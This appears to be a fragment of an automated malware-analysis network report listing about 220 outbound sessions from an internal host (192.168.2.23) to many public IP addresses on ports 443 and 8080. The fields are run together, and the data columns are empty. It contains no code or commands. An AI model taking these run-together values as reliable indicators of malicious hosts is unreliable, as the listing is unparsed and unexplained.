                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22575192.168.2.2347136107.218.94.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22576192.168.2.234325699.128.166.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22577192.168.2.233705653.174.187.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22578192.168.2.2344600175.105.53.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22579192.168.2.2346924178.75.255.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22580192.168.2.2338700220.180.225.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22581192.168.2.2353388137.50.196.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22582192.168.2.235550423.65.50.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22583192.168.2.2338176222.201.222.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22584192.168.2.2341610216.220.138.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22585192.168.2.2333518208.10.83.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22586192.168.2.235851044.218.240.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22587192.168.2.23336304.62.66.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22588192.168.2.2352394166.69.93.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22589192.168.2.233699872.9.205.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22590192.168.2.2335924150.92.220.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22591192.168.2.234818248.148.252.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22592192.168.2.2356610129.78.57.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22593192.168.2.2350552176.153.113.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22594192.168.2.2357294123.67.101.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22595192.168.2.235231871.158.68.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22596192.168.2.2360456158.135.122.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22597192.168.2.234503495.8.126.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22598192.168.2.2334218190.242.91.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22599192.168.2.235839262.53.102.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22600192.168.2.233609465.162.182.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22601192.168.2.2346336190.211.38.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22602192.168.2.235041471.183.150.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22603192.168.2.2342948149.56.6.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22604192.168.2.2336892187.60.244.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22605192.168.2.233433268.127.38.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22606192.168.2.233397294.77.158.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22607192.168.2.2354152184.150.59.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22608192.168.2.2355288207.20.64.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22609192.168.2.235468892.143.178.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22610192.168.2.235054627.171.194.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22611192.168.2.2332932119.207.186.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22612192.168.2.2357980138.127.115.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22613192.168.2.233298681.108.54.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22614192.168.2.233503462.194.37.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22615192.168.2.2357718101.192.88.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22616192.168.2.2336588144.213.70.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22617192.168.2.235412446.99.193.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22618192.168.2.235770620.57.251.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22619192.168.2.2345768100.131.104.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22620192.168.2.236044694.248.252.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22621192.168.2.235306292.111.53.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22622192.168.2.2359286170.175.34.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22623192.168.2.2357730181.85.166.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22624192.168.2.233722217.233.229.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22625192.168.2.2337066121.143.157.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22626192.168.2.2338088161.255.92.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22627192.168.2.2334160176.90.249.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22628192.168.2.2335490115.71.68.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22629192.168.2.2350250200.190.77.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22630192.168.2.2359394118.32.58.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22631192.168.2.2338002129.126.153.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22632192.168.2.2335056174.124.224.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22633192.168.2.235470642.166.229.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22634192.168.2.234905668.230.136.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22635192.168.2.235791049.52.138.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22636192.168.2.235881694.33.198.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22637192.168.2.2360468160.147.157.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22638192.168.2.2334348186.159.214.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22639192.168.2.2360428123.70.13.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22640192.168.2.23356268.32.132.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22641192.168.2.2347598138.46.210.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22642192.168.2.2334290223.5.107.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22643192.168.2.2350486196.55.23.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22644192.168.2.2358806121.17.242.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22645192.168.2.2346770142.8.37.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22646192.168.2.235735224.206.151.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22647192.168.2.23412668.43.70.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22648192.168.2.2342912170.191.132.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22649192.168.2.2339940152.146.22.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22650192.168.2.2344002145.172.90.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22651192.168.2.2352340166.100.97.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22652192.168.2.2337288118.140.76.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22653192.168.2.2360550200.230.84.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22654192.168.2.235601048.98.71.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22655192.168.2.2345880182.168.131.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22656192.168.2.2349412212.137.18.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22657192.168.2.2340934152.22.116.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22658192.168.2.2340804115.254.88.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22659192.168.2.2349370105.21.160.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22660192.168.2.2338120193.66.86.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22661192.168.2.2342128114.120.98.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22662192.168.2.2354080169.200.223.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22663192.168.2.2336552194.161.214.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22664192.168.2.2350766222.43.41.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22665192.168.2.2355684138.236.246.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22666192.168.2.2345824166.30.26.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22667192.168.2.2358498134.84.70.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22668192.168.2.2336700130.183.26.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22669192.168.2.2335170147.255.195.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22670192.168.2.2344090141.226.116.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22671192.168.2.234833496.95.132.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22672192.168.2.2359116208.100.10.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22673192.168.2.235238232.135.114.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22674192.168.2.2343718123.114.186.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22675192.168.2.234424235.196.172.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22676192.168.2.2359716164.34.120.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22677192.168.2.2340660141.103.249.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22678192.168.2.2350654222.46.18.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22679192.168.2.233631078.127.0.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22680192.168.2.234729842.253.106.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22681192.168.2.233885623.44.82.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22682192.168.2.233451070.33.132.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22683192.168.2.234243476.192.17.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22684192.168.2.233462891.174.238.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22685192.168.2.2338566189.9.174.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22686192.168.2.235974040.69.159.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22687192.168.2.235535841.1.104.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22688192.168.2.2352006177.40.144.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22689192.168.2.2338612121.132.251.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22690192.168.2.234635266.146.103.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22691192.168.2.234034696.213.54.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22692192.168.2.2332962193.40.227.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22693192.168.2.2359336189.1.94.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22694192.168.2.233538018.220.215.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22695192.168.2.2339840189.34.227.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22696192.168.2.234651864.62.148.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22697192.168.2.2340958102.84.122.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22698192.168.2.233984883.85.218.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22699192.168.2.234050861.154.235.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22700192.168.2.2334270150.78.156.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22701192.168.2.235846036.216.172.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22702192.168.2.2341898108.206.40.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22703192.168.2.2352092155.100.128.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22704192.168.2.2357336178.52.223.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22705192.168.2.233950052.149.91.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22706192.168.2.2341174153.88.73.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22707192.168.2.233905290.159.249.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22708192.168.2.235296271.217.192.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22709192.168.2.234333691.230.21.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22710192.168.2.234237892.240.59.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22711192.168.2.235345852.247.114.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22712192.168.2.234011094.82.151.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22713192.168.2.2354828100.185.71.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22714192.168.2.235528817.137.14.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22715192.168.2.235056660.189.210.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22716192.168.2.234156864.3.70.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22717192.168.2.2341832168.228.31.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22718192.168.2.2346696219.57.159.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22719192.168.2.23423389.85.158.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22720192.168.2.2337908155.19.191.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22721192.168.2.2340804104.187.134.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22722192.168.2.234631293.43.180.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22723192.168.2.2352378128.216.193.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22724192.168.2.2349562203.130.6.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22725192.168.2.235528823.73.144.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22726192.168.2.2343854203.155.203.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22727192.168.2.2350636163.215.6.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22728192.168.2.2346384158.249.243.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22729192.168.2.2347430104.242.4.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22730192.168.2.234901293.105.53.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22731192.168.2.2335472145.68.1.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22732192.168.2.235388468.145.244.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22733192.168.2.233426623.31.255.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22734192.168.2.235019298.90.187.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22735192.168.2.2351910151.124.250.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22736192.168.2.236073676.153.97.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22737192.168.2.236099631.46.233.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22738192.168.2.2353368164.251.38.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22739192.168.2.234279897.237.159.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22740192.168.2.2335842160.163.171.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22741192.168.2.235778479.145.196.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22742192.168.2.2360628200.125.87.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22743192.168.2.234585254.15.166.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22744192.168.2.2353242207.125.66.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22745192.168.2.2345560108.210.96.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22746192.168.2.2355308116.95.163.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22747192.168.2.2339788105.114.38.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22748192.168.2.234286891.106.103.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22749192.168.2.233464640.253.199.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22750192.168.2.2355850105.54.149.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22751192.168.2.234734249.152.95.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22752192.168.2.2333176122.195.40.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22753192.168.2.2358642114.54.26.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22754192.168.2.2358810125.51.236.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22755192.168.2.233876076.79.248.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22756192.168.2.235078676.190.82.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22757192.168.2.234286288.25.194.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22758192.168.2.235403678.200.168.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22759192.168.2.2339378143.76.177.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22760192.168.2.2358442159.169.21.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22761192.168.2.235342876.182.169.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22762192.168.2.2349462221.231.71.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22763192.168.2.234928671.220.112.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22764192.168.2.235273481.71.8.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22765192.168.2.2357370109.145.130.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22766192.168.2.2355126130.232.52.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22767192.168.2.2350578130.238.36.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22768192.168.2.2360868100.155.230.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22769192.168.2.2359464106.58.62.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22770192.168.2.2340080169.185.153.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22771192.168.2.233926661.211.204.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22772192.168.2.2347422109.171.0.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22773192.168.2.2356214166.19.163.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22774192.168.2.2333822149.22.122.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22775192.168.2.234066036.224.243.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22776192.168.2.235705488.227.223.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22777192.168.2.235109054.235.33.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22778192.168.2.233545468.68.192.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22779192.168.2.2359682191.78.27.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22780192.168.2.236074870.83.99.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22781192.168.2.2345538161.72.149.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22782192.168.2.2340938143.227.238.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22783192.168.2.2354868104.185.38.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22784192.168.2.233864040.91.14.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22785192.168.2.23528025.182.2.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22786192.168.2.235300414.76.41.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22787192.168.2.2348146152.131.191.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22788192.168.2.2340848209.65.111.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22789192.168.2.2356832186.71.5.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22790192.168.2.2335992192.202.130.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22791192.168.2.2338876191.96.81.1068080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22792192.168.2.234807894.123.51.1938080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22793192.168.2.2343680144.172.69.1308080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22794192.168.2.2344162122.254.98.2438080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22795192.168.2.2359162221.209.67.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
